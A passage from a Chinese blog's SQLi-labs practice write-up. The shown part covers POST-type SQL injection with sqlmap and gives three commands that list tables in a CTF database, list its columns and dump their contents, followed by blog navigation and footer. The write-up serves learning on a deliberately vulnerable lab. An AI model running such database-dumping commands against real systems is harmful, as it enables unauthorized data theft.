<figure class="highlight taggerscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs taggerscript">python2 sqlmap.py -r &quot;c:<span class="hljs-symbol">\U</span>sers<span class="hljs-symbol">\H</span>P<span class="hljs-symbol">\D</span>esktop<span class="hljs-symbol">\1</span>.txt&quot; -p id --D skctf_flag --tables<br></code></pre></td></tr></table></figure>

<p>查字段：</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs stylus">python2 sqlmap<span class="hljs-selector-class">.py</span> -r <span class="hljs-string">&quot;c:\Users\HP\Desktop\1.txt&quot;</span> -<span class="hljs-selector-tag">p</span> id --D database_name -T table_name --<span class="hljs-attribute">columns</span><br></code></pre></td></tr></table></figure>

<p>查内容：</p>
<figure class="highlight taggerscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs taggerscript">python2 sqlmap.py -r &quot;c:<span class="hljs-symbol">\U</span>sers<span class="hljs-symbol">\H</span>P<span class="hljs-symbol">\D</span>esktop<span class="hljs-symbol">\1</span>.txt&quot; -p id --D database_name -T table_name -C column_name --dump<br></code></pre></td></tr></table></figure>

<h5 id="此文大部分方法和内容转载于"><a href="#此文大部分方法和内容转载于" class="headerlink" title="此文大部分方法和内容转载于"></a>此文大部分方法和内容转载于</h5><p><a target="_blank" rel="noopener" href="https://blog.csdn.net/vhkjhwbs/article/details/89740401">https://blog.csdn.net/vhkjhwbs/article/details/89740401</a></p>

      </section>
      <section class="extra">
        
          <ul class="copyright">
  
    <li><strong>本文作者：</strong>4v1d</li>
    <li><strong>本文链接：</strong><a href="http://daweitech.github.io/2020/12/09/2021/sql/1-10/index.html" title="http:&#x2F;&#x2F;daweitech.github.io&#x2F;2020&#x2F;12&#x2F;09&#x2F;2021&#x2F;sql&#x2F;1-10&#x2F;index.html">http:&#x2F;&#x2F;daweitech.github.io&#x2F;2020&#x2F;12&#x2F;09&#x2F;2021&#x2F;sql&#x2F;1-10&#x2F;index.html</a></li>
    <li><strong>版权声明：</strong>本博客所有文章均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" title="BY-NC-SA" target="_blank" rel="noopener">BY-NC-SA</a> 许可协议，转载请注明出处！</li>
  
</ul>
        
        
        
  <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/sql/" rel="tag">sql</a></li></ul> 

        
  <nav class="nav">
    <a href="/2021/02/18/2021/sql/11-20/"><i class="iconfont iconleft"></i>SQL labs11-20</a>
    <a href="/2020/10/15/2021/x/%E5%8D%9A%E5%AE%A2%E8%A7%A3%E7%96%91/">博客解疑<i class="iconfont iconright"></i></a>
  </nav>

      </section>
      
    </section>
  </div>
</article></div>
      <div class="col-xl-3">
        
          
  <aside class="toc-wrap">
    <h3 class="toc-title">文章目录：</h3>
    <ol class="toc"><li class="toc-item toc-level-4"><a class="toc-link" href="#Less1%EF%BC%9A%EF%BC%88%E5%9F%BA%E4%BA%8E%E9%94%99%E8%AF%AF%E7%9A%84GET%E5%8D%95%E5%BC%95%E5%8F%B7%E5%AD%97%E7%AC%A6%E5%9E%8B%E6%B3%A8%E5%85%A5"><span class="toc-text">Less1：（基于错误的GET单引号字符型注入)</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Less-2%EF%BC%9A-GET%E5%9E%8B%E6%95%B4%E5%9E%8B%E6%B3%A8%E5%85%A5%EF%BC%89"><span class="toc-text">Less 2：(GET型整型注入）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Less-3-%E5%9F%BA%E4%BA%8E%E9%94%99%E8%AF%AF%E7%9A%84get%E5%8D%95%E5%BC%95%E5%8F%B7%E5%8F%98%E5%BD%A2%E5%AD%97%E7%AC%A6%E6%B3%A8%E5%85%A5"><span class="toc-text">Less-3 (基于错误的get单引号变形字符注入)</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Less-4-%E5%9F%BA%E4%BA%8E%E9%94%99%E8%AF%AF%E7%9A%84get%E5%8F%8C%E5%BC%95%E5%8F%B7%E5%AD%97%E7%AC%A6%E5%9E%8B%E6%B3%A8%E5%85%A5"><span class="toc-text">Less-4 (基于错误的get双引号字符型注入)</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Less-5-%E5%8F%8C%E6%B3%A8%E5%85%A5get%E5%8D%95%E5%BC%95%E5%8F%B7%E5%AD%97%E7%AC%A6%E5%9E%8B%E6%B3%A8%E5%85%A5"><span class="toc-text">Less-5(双注入get单引号字符型注入)</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Less-6-%E5%8F%8C%E6%B3%A8%E5%85%A5get%E5%8F%8C%E5%BC%95%E5%8F%B7%E5%AD%97%E7%AC%A6%E5%9E%8B%E6%B3%A8%E5%85%A5"><span class="toc-text">Less-6 (双注入get双引号字符型注入)</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Less-7-%E5%AF%BC%E5%87%BA%E6%96%87%E4%BB%B6get%E5%AD%97%E7%AC%A6%E5%9E%8B%E6%B3%A8%E5%85%A5"><span class="toc-text">Less-7 (导出文件get字符型注入)</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Less-8-%E5%B8%83%E5%B0%94%E5%9E%8B%E5%8D%95%E5%BC%95%E5%8F%B7GET%E7%9B%B2%E6%B3%A8"><span class="toc-text">Less-8 (布尔型单引号GET盲注)</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Less-9-%E5%9F%BA%E4%BA%8E%E6%97%B6%E9%97%B4%E7%9A%84GET%E5%8D%95%E5%BC%95%E5%8F%B7%E7%9B%B2%E6%B3%A8"><span class="toc-text">Less-9 (基于时间的GET单引号盲注)</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Less-10-%E5%9F%BA%E4%BA%8E%E6%97%B6%E9%97%B4%E7%9A%84%E5%8F%8C%E5%BC%95%E5%8F%B7%E7%9B%B2%E6%B3%A8"><span class="toc-text">Less-10 (基于时间的双引号盲注)</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#sqlmap-post%E7%B1%BB%E5%9E%8B%E6%B3%A8%E5%85%A5%E6%96%B9%E6%B3%95%EF%BC%9A"><span class="toc-text">sqlmap post类型注入方法：</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%AD%A4%E6%96%87%E5%A4%A7%E9%83%A8%E5%88%86%E6%96%B9%E6%B3%95%E5%92%8C%E5%86%85%E5%AE%B9%E8%BD%AC%E8%BD%BD%E4%BA%8E"><span class="toc-text">此文大部分方法和内容转载于</span></a></li></ol></li></ol>
  </aside>

        
      </div>
    </div>
  </div>
</main>
  

<footer class="footer">
  <div class="footer-social"><a 
        href="tencent://message/?Menu=yes&uin=905095727 "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color= '#12B7F5'" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  iconQQ "></i>
      </a><a 
        href="javascript:; "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color= '#09BB07'" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  iconwechat-fill "></i>
      </a><a 
        href="https://www.instagram.com/izhaoo/ "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color= '#DA2E76'" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  iconinstagram "></i>
      </a><a 
        href="https://github.com/zhaoo "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color= '#9f7be1'" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  icongithub-fill "></i>
      </a><a 
        href="mailto:izhaoo@163.com "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color=#FF3B00" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  iconmail"></i>
      </a></div>
  
    <div class="footer-copyright"><p>Powered by <a target="_blank" href="https://hexo.io">Hexo</a>  |  Theme - <a target="_blank" href="https://github.com/izhaoo/hexo-theme-zhaoo">zhaoo</a></p></div>
  
</footer>
  
      <div class="fab fab-plus">
    <i class="iconfont iconplus"></i>
  </div>
  
  
  
  <div class="fab fab-up">
    <i class="iconfont iconcaret-up"></i>
  </div>
  
  
  
    
<script src="/js/color-mode.js"></script>

  
  
</body>

<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>





  
<script src="https://cdn.bootcdn.net/ajax/libs/jquery.lazyload/1.9.1/jquery.lazyload.min.js"></script>




  
<script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.5.7/jquery.fancybox.min.js"></script>






  
<script src="https://cdn.bootcdn.net/ajax/libs/jquery.qrcode/1.0/jquery.qrcode.min.js"></script>




<script src="/js/utils.js"></script>
<script src="/js/script.js"></script>







  <script>
    (function () {
      var bp = document.createElement('script');
      var curProtocol = window.location.protocol.split(':')[0];
      if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
      } else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
      }
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(bp, s);
    })();
  </script>













</html>